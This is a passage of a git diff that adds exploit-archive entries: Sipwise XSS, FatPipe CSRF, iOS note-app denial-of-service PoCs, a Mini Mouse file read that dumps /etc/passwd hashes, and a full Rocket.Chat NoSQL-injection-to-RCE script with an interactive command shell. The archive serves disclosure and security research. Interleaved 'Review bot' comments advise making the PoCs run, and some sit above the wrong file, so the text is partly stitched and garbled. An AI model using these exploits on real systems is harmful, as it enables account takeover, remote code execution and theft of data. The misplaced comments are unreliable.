infrastructures, Sipwise C5 provides a powerful REST API interface. + +Desc: Sipwise software platform suffers from multiple authenticated stored and reflected +cross-site scripting vulnerabilities when input passed via several parameters to several +scripts is not properly sanitized before being returned to the user. This can be exploited +to execute arbitrary HTML and script code in a user's browser session in context of an +affected site. + +Tested on: Apache/2.2.22 (Debian) + Apache/2.2.16 (Debian) + nginx + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5648 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php + + +13.04.2021 + +-- + + +Stored XSS (POST tsetname): +--------------------------- + + + +
+ ' /> + + + +
+ + + + +Stored XSS (POST firstname, lastname, company): +----------------------------------------------- + + + +
+ + + + + + + + + + + + + +
+ + + + +Reflected XSS (GET lang): +------------------------- + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/50338.txt b/exploits/hardware/webapps/50338.txt new file mode 100644 index 000000000..528d7d010 --- /dev/null +++ b/exploits/hardware/webapps/50338.txt @@ -0,0 +1,108 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + + + + + + +
+ + +
+
+
\ No newline at end of file
diff --git a/exploits/ios/dos/49957.py b/exploits/ios/dos/49957.py
new file mode 100755
index 000000000..5e8d8e573
--- /dev/null
+++ b/exploits/ios/dos/49957.py
@@ -0,0 +1,35 @@
+# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010
+# Version: 1.4.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49978.py b/exploits/ios/dos/49978.py
new file mode 100755
index 000000000..641bdc839
--- /dev/null
+++ b/exploits/ios/dos/49978.py
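Review bot: The file is committed as an executable `.py` (mode 100755) but only its last ten lines are Python; the prose between `##### Vulnerability #####` and `--> payload.py <--` is not commented, so running the file fails with a SyntaxError before the `open()` call is reached. The same layout is repeated in 49978, 50001, 50002, 50003 and 49977 in this commit; either prefix every prose line with `#` or rename the files to `.txt` and keep only the tail as the script. The script itself uses a bare `except:` that hides the actual `OSError` and leaves the file unclosed if `write` fails; a context manager and a typed handler report the real cause.
```python
try:
    with open("payload.txt", "w") as f:
        f.write(buffer)
    print("File created")
except OSError as e:
    print("File cannot be created:", e)
```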
@@ -0,0 +1,35 @@
+# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
+# Date: 06-07-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608
+# Version: 3.0.6
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50001.py b/exploits/ios/dos/50001.py
new file mode 100755
index 000000000..a6fee8b92
--- /dev/null
+++ b/exploits/ios/dos/50001.py
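Review bot: The vulnerability sentence says `Color Notes is vulnerable to a DoS condition ...` while the title is `Sticky Notes Widget Version 3.0.6` and the download link is `sticky-notes-widget`, so the description was carried over from 49957 and names the wrong product; it should read `Sticky Notes Widget is vulnerable to a DoS condition ...`. 49977 (memono Notepad) in this commit has the same carried-over sentence.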
@@ -0,0 +1,35 @@
+# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
+# Date: 06-14-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888
+# Version: 3.0.3
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50002.py b/exploits/ios/dos/50002.py
new file mode 100755
index 000000000..7ad0008ff
--- /dev/null
+++ b/exploits/ios/dos/50002.py
@@ -0,0 +1,37 @@
+# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
+# Date: 06-14-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/es/app/post-it/id920127738
+# Version: 5.0.1
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Post-it is vulnerable to a DoS condition when a long list of characters is
+being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new
+payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/50003.py b/exploits/ios/dos/50003.py
new file mode 100755
index 000000000..f13b9dbc2
--- /dev/null
+++ b/exploits/ios/dos/50003.py
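Review bot: As rendered here the `try:` body (`f = open("payload.txt","w")` through `print ("File created")`) and the `except:` body sit at column 0, so even the Python tail raises `IndentationError: expected an indented block` and never writes `payload.txt`; the other copies of this script in the commit (49957, 49978, 50001, 49977) indent those statements, and 50003 shows the same flattening. The line wraps inside the prose (`a new` / `payload.txt file`) suggest the file passed through an e-mail client that also stripped the indentation, so re-indenting the four statements under `try:` and the one under `except:` by four spaces is all that is needed.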
@@ -0,0 +1,36 @@
+# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
+# Date: 06-14-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
+# Version: 6.4
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Notex – the best notes is vulnerable to a DoS condition when a long list of
+characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/local/49977.py b/exploits/ios/local/49977.py
new file mode 100755
index 000000000..7dda87b05
--- /dev/null
+++ b/exploits/ios/local/49977.py
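Review bot: The `try:`/`except:` bodies in payload.py are not indented as committed (`f = open(...)`, `f.write(buffer)`, `f.close()`, `print (...)` sit at column 0), so the interpreter stops with an IndentationError and never writes payload.txt; the identically-structured script in the Secure Notepad entry of this commit is indented, so this is presumably a formatting loss rather than intent, and re-indenting the five lines fixes it. The steps also say `Paste the content from payload.txt twice`, i.e. the trigger is roughly 700,000 characters while the script writes 350,000; stating the effective size once in the header would save readers a false negative when they paste only once.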
@@ -0,0 +1,35 @@
+# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
+# Date: 06-09-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
+# Version: 4.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/webapps/49747.txt b/exploits/ios/webapps/49747.txt
new file mode 100644
index 000000000..17f7aeb26
--- /dev/null
+++ b/exploits/ios/webapps/49747.txt
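Review bot: The vulnerability paragraph names a different product than the entry: `Color Notes is vulnerable to a DoS condition ...` in a file whose title and download link are memono Notepad 4.2, evidently a leftover from a sibling advisory. It should read `memono Notepad is vulnerable to a DoS condition when a long list of characters is being used when creating a note:`. The bare `except:` in payload.py should also be `except OSError as e:` with the error in the message, so a failed write says why instead of printing a fixed string.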
@@ -0,0 +1,397 @@
+# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
+# Author: gosh
+# Date: 05-04-2021
+# Vendor Homepage: http://yodinfo.com
+# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
+# Version: 9.3.0
+# Tested on: iPhone; iOS 14.4.2
+
+GET /op=get_device_info HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 0
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+ "ret_code": 1,
+ "ret_msg": "success",
+ "data": {
+ "uuid": "7E07125B-61BE-4F12-820C-FA706C445219",
+ "model": "iPhone",
+ "sys_name": "iOS",
+ "sys_version": "14.4.2",
+ "battery_state": 0,
+ "battery_level": -1,
+ "memery_total_size": 2983772160,
+ "device_name": "mobile",
+ "user_name": "iPhone",
+ "pwd": "",
+ "dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
+ "dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
+ "dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
+ "sys_type": 3
+ }
+}
+
+
+
+-------------------------------------------------------------------------------------
+
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 0
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+ "ret_code": 1,
+ "ret_msg": "success",
+ "data": {
+ "list": [{
+ "path": "//usr",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "usr",
+ "name_display": "usr",
+ "file_size": 288,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//bin",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "bin",
+ "name_display": "bin",
+ "file_size": 128,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//sbin",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "sbin",
+ "name_display": "sbin",
+ "file_size": 544,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//.file",
+ "is_local": true,
+ "is_hide": true,
+ "is_floder": false,
+ "name": ".file",
+ "name_display": ".file",
+ "file_size": 0,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//etc",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "etc",
+ "name_display": "etc",
+ "file_size": 11,
+ "create_time": 1577865.600000,
+ "update_time": 1577865.600000,
+ "sys_type": 3
+ }, {
+ "path": "//System",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "System",
+ "name_display": "System",
+ "file_size": 128,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//var",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "var",
+ "name_display": "var",
+ "file_size": 11,
+ "create_time": 1577865.600000,
+ "update_time": 1577865.600000,
+ "sys_type": 3
+ }, {
+ "path": "//Library",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "Library",
+ "name_display": "Library",
+ "file_size": 672,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//private",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "private",
+ "name_display": "private",
+ "file_size": 224,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//dev",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "dev",
+ "name_display": "dev",
+ "file_size": 1395,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//.ba",
+ "is_local": true,
+ "is_hide": true,
+ "is_floder": true,
+ "name": ".ba",
+ "name_display": ".ba",
+ "file_size": 64,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//.mb",
+ "is_local": true,
+ "is_hide": true,
+ "is_floder": true,
+ "name": ".mb",
+ "name_display": ".mb",
+ "file_size": 64,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//tmp",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "tmp",
+ "name_display": "tmp",
+ "file_size": 15,
+ "create_time": 1577865.600000,
+ "update_time": 1577865.600000,
+ "sys_type": 3
+ }, {
+ "path": "//Applications",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "Applications",
+ "name_display": "Applications",
+ "file_size": 3296,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//Developer",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "Developer",
+ "name_display": "Developer",
+ "file_size": 64,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }, {
+ "path": "//cores",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "cores",
+ "name_display": "cores",
+ "file_size": 64,
+ "create_time": 0,
+ "update_time": 0,
+ "sys_type": 3
+ }]
+ }
+}
+
+-------------------------
+using the data found:
+/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 101
+
+{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+ "ret_code": 1,
+ "ret_msg": "success",
+ "data": {
+ "list": [{
+ "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "GDT",
+ "name_display": "GDT",
+ "file_size": 96,
+ "create_time": 1617228.400302,
+ "update_time": 1617228.400302,
+ "sys_type": 3
+ }, {
+ "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": false,
+ "name": "input_photo.jpg",
+ "name_display": "input_photo.jpg",
+ "file_size": 6141491,
+ "create_time": 1617583.738397,
+ "update_time": 1617583.738402,
+ "sys_type": 3
+ }, {
+ "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "Ico",
+ "name_display": "Ico",
+ "file_size": 64,
+ "create_time": 1617583.334913,
+ "update_time": 1617583.334913,
+ "sys_type": 3
+ }, {
+ "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
+ "is_local": true,
+ "is_hide": false,
+ "is_floder": true,
+ "name": "Download",
+ "name_display": "Download",
+ "file_size": 64,
+ "create_time": 1617228.371587,
+ "update_time": 1617228.371587,
+ "sys_type": 3
+ }]
+ }
+}
+
+----------------------------------------------------------------------
+
+GET /file=/etc/passwd HTTP/1.1
+Host: 192.168.1.104:8039
+Accept: */*
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Connection: keep-alive
+Accept-Encoding: gzip, deflate
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Content-Length: 4
+
+{}
+
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/octet-stream
+Content-Range: bytes 0-0/2018
+Content-Length : 2018
+
+##
+# User Database
+#
+# This file is the authoritative user database.
+##
+
+nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
+root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
+mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
+daemon:*:1:1:System Services:/var/root:/usr/bin/false
+_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
+_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
+_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
+_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
+_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
+_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
+_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
+_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
+_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
+_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
+_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
+_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
+_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
+_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
+_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
+_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
+_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
+_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
+_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
+_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
+_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
+_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
+_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
+_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
+_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
+_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false
\ No newline at end of file
diff --git a/exploits/linux/webapps/49960.py b/exploits/linux/webapps/49960.py
new file mode 100755
index 000000000..0876dc164
--- /dev/null
+++ b/exploits/linux/webapps/49960.py
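Review bot: The title calls this `Local File inclusion / Path Traversal`, but the transcript shows an unauthenticated arbitrary file read by absolute path: `GET /file=/etc/passwd` returns the file verbatim with no `../` sequence and no credential in the request, and `/op=get_file_list` enumerates `/` and any container path given in `{"path": ...}`; describing it as "unauthenticated arbitrary file read / directory listing" would match what is demonstrated. The `get_device_info` response carries `"pwd": ""`, which suggests the app has a password setting, so the write-up should state whether a configured password gates `/file=` and `/op=get_file_list`, since that decides whether the bug is reachable on a hardened install. Every response also sends `Access-Control-Allow-Origin: *` together with `Access-Control-Allow-Credentials: true`, so a web page open in a browser on the same network can presumably read these responses cross-origin without any direct access to the phone; that widens the attacker model and deserves a sentence.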
@@ -0,0 +1,172 @@
+# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)
+# Author: enox
+# Date: 06-06-2021
+# Product: Rocket.Chat
+# Vendor: https://rocket.chat/
+# Vulnerable Version(s): Rocket.Chat 3.12.1
+# CVE: CVE-2021-22911
+# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat
+
+#!/usr/bin/python
+
+import requests
+import string
+import time
+import hashlib
+import json
+import oathtool
+import argparse
+
+parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')
+parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)
+parser.add_argument('-a', help='Administrator email', required=True)
+parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)
+args = parser.parse_args()
+
+
+adminmail = args.a
+lowprivmail = args.u
+target = args.t
+
+
+def forgotpassword(email,url):
+ payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'
+ headers={'content-type': 'application/json'}
+ r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)
+ print("[+] Password Reset Email Sent")
+
+
+def resettoken(url):
+ u = url+"/api/v1/method.callAnon/getPasswordPolicy"
+ headers={'content-type': 'application/json'}
+ token = ""
+
+ num = list(range(0,10))
+ string_ints = [str(int) for int in num]
+ characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints
+
+ while len(token)!= 43:
+ for c in characters:
+ payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)
+ r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+ time.sleep(0.5)
+ if 'Meteor.Error' not in r.text:
+ token += c
+ print(f"Got: {token}")
+
+ print(f"[+] Got token : {token}")
+ return token
+
+
+def changingpassword(url,token):
+ payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'
+ headers={'content-type': 'application/json'}
+ r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
+ if "error" in r.text:
+ exit("[-] Wrong token")
+ print("[+] Password was changed !")
+
+
+def twofactor(url,email):
+ # Authenticating
+ sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
+ payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
+ headers={'content-type': 'application/json'}
+ r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
+ if "error" in r.text:
+ exit("[-] Couldn't authenticate")
+ data = json.loads(r.text)
+ data =(data['message'])
+ userid = data[32:49]
+ token = data[60:103]
+ print(f"[+] Succesfully authenticated as {email}")
+
+ # Getting 2fa code
+ cookies = {'rc_uid': userid,'rc_token': token}
+ headers={'X-User-Id': userid,'X-Auth-Token': token}
+ payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'
+ r = requests.get(url+payload,cookies=cookies,headers=headers)
+ code = r.text[46:98]
+ print(f"Got the code for 2fa: {code}")
+ return code
+
+
+def changingadminpassword(url,token,code):
+ payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'
+ headers={'content-type': 'application/json'}
+ r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
+ if "403" in r.text:
+ exit("[-] Wrong token")
+
+ print("[+] Admin password changed !")
+
+
+def rce(url,code,cmd):
+ # Authenticating
+ sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
+ headers={'content-type': 'application/json'}
+ payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'
+ r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
+ if "error" in r.text:
+ exit("[-] Couldn't authenticate")
+ data = json.loads(r.text)
+ data =(data['message'])
+ userid = data[32:49]
+ token = data[60:103]
+ print("[+] Succesfully authenticated as administrator")
+
+ # Creating Integration
+ payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'
+ cookies = {'rc_uid': userid,'rc_token': token}
+ headers = {'X-User-Id': userid,'X-Auth-Token': token}
+ r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)
+ data = r.text
+ data = data.split(',')
+ token = data[12]
+ token = token[9:57]
+ _id = data[18]
+ _id = _id[7:24]
+
+ # Triggering RCE
+ u = url + '/hooks/' + _id + '/' +token
+ r = requests.get(u)
+ print(r.text)
+
+############################################################
+
+
+# Getting Low Priv user
+print(f"[+] Resetting {lowprivmail} password")
+## Sending Reset Mail
+forgotpassword(lowprivmail,target)
+
+## Getting reset token
+token = resettoken(target)
+
+## Changing Password
+changingpassword(target,token)
+
+
+# Privilege Escalation to admin
+## Getting secret for 2fa
+secret = twofactor(target,lowprivmail)
+
+
+## Sending Reset mail
+print(f"[+] Resetting {adminmail} password")
+forgotpassword(adminmail,target)
+
+## Getting reset token
+token = resettoken(target)
+
+
+## Resetting Password
+code = oathtool.generate_otp(secret)
+changingadminpassword(target,token,code)
+
+## Authenticting and triggering rce
+
+while True:
+ cmd = input("CMD:> ")
+ code = oathtool.generate_otp(secret)
+ rce(target,code,cmd)
\ No newline at end of file
diff --git a/exploits/multiple/dos/49697.py b/exploits/multiple/dos/49697.py
new file mode 100755
index 000000000..9f99a6189
--- /dev/null
+++ b/exploits/multiple/dos/49697.py
